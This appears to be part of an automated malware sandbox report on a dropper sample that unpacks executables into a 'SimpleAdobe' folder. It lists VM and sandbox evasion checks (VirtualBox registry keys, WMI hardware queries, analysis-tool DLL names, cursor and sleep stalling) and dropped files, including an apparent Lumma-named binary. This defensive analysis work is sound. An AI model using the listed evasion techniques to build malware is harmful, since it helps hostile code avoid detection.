Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\q9Sc3pS9TsI8vZtTlbAuGG_b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\FCK5Px_iTbBaGQTFBpzZeks2.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS4AA4.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: pRIMqfuwRZ49ldgjUZ_z2py6.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Sandbox detection routine: GetCursorPos, DecisionNode, Sleep

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Stalling execution: Execution stalls by calling Sleep

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp	Binary or memory string: R.SBIEDLL.DLL>3
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3124005026.0000000000C1A000.00000020.00000001.01000000.00000010.sdmp	Binary or memory string: R.SBIEDLL.DLL
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 16F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 3500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: 3250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Memory allocated: 1C57B8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Memory allocated: 1C57B8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2910000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos,

7_2_0045D9F0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Window / User API: threadDelayed 588			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Window / User API: threadDelayed 9258

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-7LPN0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-T59CT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\openh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6APVR.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\QtAVWidgets1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\msvcr120.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-280SC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\softjenimmp3converter.exe	Dropped PE file which has not been started: C:\ProgramData\DDEReadline 2.22.66\DDEReadline 2.22.66.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-OPKFD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-FREGM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\is-ETDPI.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2804[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5OpenGL.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlx[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-F9ROM.tmp\FCK5Px_iTbBaGQTFBpzZeks2.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Soft Jenim MP3 Converter\libcurl.dll (copy)	Jump to dropped file
